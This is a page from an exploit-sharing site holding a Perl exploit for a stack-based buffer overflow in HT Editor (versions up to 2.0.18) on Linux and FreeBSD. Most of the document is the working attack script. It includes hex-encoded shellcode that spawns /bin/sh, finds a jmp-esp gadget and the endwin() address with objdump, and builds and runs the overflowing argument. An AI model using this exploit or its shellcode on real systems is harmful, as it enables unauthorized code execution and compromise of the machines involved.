[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HT Editor File openning Stack Overflow (0day)

Author
ZadYree
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15743
Category
local exploits
Date add
31-03-2011
Platform
linux
# Exploit Title: HT Editor File openning Stack Overflow (0day)
# Date: March 30th 2011
# Author: ZadYree
# Software Link: http://hte.sourceforge.net/downloads.html
# Version: <= 2.0.18
# Tested on: Linux/Windows (buffer padding may differ on W32)
# CVE : None
#!/usr/bin/perl
=head1 TITLE
 
HT Editor <=2.0.18 0day Stack-Based Overflow Exploit
 
 
=head1 DESCRIPTION
 
The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip.
 
 
=head2 AUTHOR
 
ZadYree ~ 3LRVS Team
 
 
=head3 SEE ALSO
 
ZadYree's blog: z4d.tuxfamily.org
 
3LRVS blog: 3lrvs.tuxfamily.org
 
Shellcodes based on
http://www.shell-storm.org/shellcode/files/shellcode-606.php
http://www.shell-storm.org/shellcode/files/shellcode-171.php
 
=> Thanks
=cut
use 5.010;
 
my ($esp, $retaddr);
my $scz =   [   "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e" .
                "\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" .
                "\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" .
                "\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" .
                "\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" .
                "\x53\x52\x54\x8a\xe2\xce\x81",
                "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b" .
                "\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53" .
                "\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff" .
                "/bin/sh"   ];
 
say'[*]Looking for $esp and endwin()...';
 
my $namez = [qw#/usr/bin/hte /usr/local/bin/ht#];
 
my $infos = get_infos(qx{uname});
 
my $name = $infos->[0];
 
 
say '[+]endwin() address found! (0x', $infos->[3],')';
 
for my $line(qx{objdump -D $name | grep "ff e4"}) {
    $esp = "0" . $1, last if ($line =~ m{([a-f0-9]{7}).+jmp\s{4}\*%esp});
}
 
say '[+]$esp place found! (0x', $esp, ")\012Now exploiting...";
 
my @payload = ($infos->[0], ("A" x ($infos->[1] - length(qx{pwd}))) . reverse(pack('H*', $infos->[3])) . reverse(pack('H*', $esp)) . $infos->[2]);
exec(@payload);
 
 
sub get_infos {
    given(shift) {
        when(/Linux/) {
            return([$namez->[0], 4108, $scz->[0], getendwin("linux")]);
        }
        when(/FreeBSD/) {
            return([$namez->[1], 271, $scz->[1], getendwin("freebsd")]);
        }
        #Possibility to add friends ^^
    }
}
 
sub getendwin {
    given(shift) {
        when("linux") {
            my $n = $namez->[0];
            for (qx{objdump -d $n | grep endwin}) {
                $retaddr = $1, last if ($_ =~ m{(.*) <});
            }
            return($retaddr);
        }
        when("freebsd") {
            return("282c2990");
        }
    }
}



#  0day.today [2024-12-28]  #